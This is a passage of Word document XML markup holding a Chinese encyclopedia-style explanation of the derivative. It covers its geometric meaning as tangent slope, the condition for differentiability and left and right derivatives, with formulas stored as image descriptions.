          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="171450" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="164" name="图片 164" descr="说明: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说明: x_{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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>处导函数的函数值。但通常也可以说导函数为导数，其区别仅在于一个点还是连续的点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>几何意义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2857500" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="163" name="图片 163" descr="说明: Derivative.jpg">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说明: Derivative.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D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如右图所示，设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="162" name="图片 162" descr="说明: P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说明: P_{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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为曲线上的一个定点，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="161" name="图片 161" descr="说明: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说明: P"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为曲线上的一个动点。当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="160" name="图片 160" descr="说明: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说明: P"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>沿曲线逐渐趋向于点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="159" name="图片 159" descr="说明: P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说明: P_{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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时，并且割线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="333375" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="158" name="图片 158" descr="说明: PP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说明: PP_{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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的极限位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="333375" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="157" name="图片 157" descr="说明: P_{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说明: P_{0}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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>存在，则称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="333375" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="156" name="图片 156" descr="说明: P_{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说明: P_{0}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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为曲线在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="155" name="图片 155" descr="说明: P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说明: P_{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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>处的切线。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>若曲线为一函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="704850" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="154" name="图片 154" descr="说明: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说明: y=f(x)"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的图像，那么割线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="333375" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="153" name="图片 153" descr="说明: PP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说明: PP_{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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的斜率为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2838450" cy="409575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="152" name="图片 152" descr="说明: \tan \varphi ={\frac  {\Delta y}{\Delta x}}={\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\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说明: \tan \varphi ={\frac  {\Delta y}{\Delta x}}={\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\Delta x}}"/>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38450" cy="409575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="151" name="图片 151" descr="说明: P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说明: P_{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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>处的切线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="333375" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="150" name="图片 150" descr="说明: P_{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说明: P_{0}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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="333375" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="149" name="图片 149" descr="说明: PP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说明: PP_{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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的极限位置存在时，此时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="638175" cy="142875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="148" name="图片 148" descr="说明: \Delta x\to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说明: \Delta x\to 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38175" cy="142875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="533400" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="147" name="图片 147" descr="说明: \varphi \to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说明: \varphi \to \alpha "/>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3400" cy="133350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="333375" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="146" name="图片 146" descr="说明: P_{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说明: P_{0}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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的斜率</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="409575" cy="133350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="145" name="图片 145" descr="说明: \tan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说明: \tan \alpha "/>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9575" cy="133350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3800475" cy="409575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="144" name="图片 144" descr="说明: \tan \alpha =\lim _{{\Delta x\to 0}}\tan \varphi =\lim _{{\Delta x\to 0}}{\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\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tan \alpha =\lim _{{\Delta x\to 0}}\tan \varphi =\lim _{{\Delta x\to 0}}{\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\Delta x}}"/>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00475" cy="409575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>上式与一般定义中的导数定义是完全相同，则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1133475" cy="209550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="143" name="图片 143" descr="说明: f'(x_{0})=\tan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说明: f'(x_{0})=\tan \alpha "/>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133475" cy="209550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，故导数的几何意义即曲线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="704850" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="142" name="图片 142" descr="说明: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说明: y=f(x)"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1028700" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="141" name="图片 141" descr="说明: P_{0}(x_{0},f(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说明: P_{0}(x_{0},f(x_{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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>处切线的斜率。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>函数可导的条件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如果一个</w:t>
      </w:r>
      <w:hyperlink r:id="rId77" w:tooltip="函数（页面不存在）" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="A55858"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>函数</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:hyperlink r:id="rId78" w:tooltip="定义域（页面不存在）" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="A55858"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>定义域</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为全体</w:t>
      </w:r>
      <w:hyperlink r:id="rId79" w:tooltip="实数（页面不存在）" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="A55858"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>实数</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，即函数在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="876300" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="140" name="图片 140" descr="说明: (-\infty ,+\inft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说明: (-\infty ,+\infty )"/>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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>上都有定义，那么该函数是不是在定义域上处处可导呢？答案是否定的。函数在定义域中一点可导需要一定的条件是：函数在该点的左右两侧导数都存在且相等。这实际上是按照极限存在的一个</w:t>
      </w:r>
      <w:hyperlink r:id="rId81" w:tooltip="充要条件（页面不存在）" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="A55858"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>充要条件</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:hyperlink r:id="rId82" w:tooltip="极限" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>极限</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>存在，它的左右极限存在且相等）推导而来：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6838950" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="139" name="图片 139" descr="说明: \lim _{{\Delta x\to 0}}{\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\Delta x}}=\lim _{{\Delta x\to 0^{{-}}}}{\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\Delta x}}=\lim _{{\Delta x\to 0^{{+}}}}{\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\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说明: \lim _{{\Delta x\to 0}}{\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\Delta x}}=\lim _{{\Delta x\to 0^{{-}}}}{\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\Delta x}}=\lim _{{\Delta x\to 0^{{+}}}}{\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\Delta x}}"/>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838950" cy="419100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>上式中，后两个式子可以定义为函数在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="171450" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="138" name="图片 138" descr="说明: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说明: x_{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Pr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>处的左右导数：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:right w:val="single" w:sz="4"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5409"/>
      </w:tblGrid>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左导数：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="2905125" cy="419100"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                  <wp:docPr id="137" name="图片 137" descr="说明: f'_{{-}}(x_{0})=\lim _{{\Delta x\to 0^{{-}}}}{\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\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说明: f'_{{-}}(x_{0})=\lim _{{\Delta x\to 0^{{-}}}}{\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\Delta x}}"/>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05125" cy="419100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
          <w:right w:val="single" w:sz="4"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5409"/>
      </w:tblGrid>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右导数：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="2905125" cy="419100"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                  <wp:docPr id="136" name="图片 136" descr="说明: f'_{{+}}(x_{0})=\lim _{{\Delta x\to 0^{{+}}}}{\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\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说明: f'_{{+}}(x_{0})=\lim _{{\Delta x\to 0^{{+}}}}{\frac  {f(x_{0}+\Delta x)-f(x_{0})}{\Delta x}}"/>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05125" cy="419100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>用两个函数的例子来说明函数可导的条件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3810000" cy="1724025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="135" name="图片 135" descr="说明: http://upload.wikimedia.org/wikipedia/commons/thumb/e/e3/Function_sgnx.jpg/400px-Function_sgnx.jpg">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说明: http://upload.wikimedia.org/wikipedia/commons/thumb/e/e3/Function_sgnx.jpg/400px-Function_sgnx.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10000" cy="1724025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="15"/>
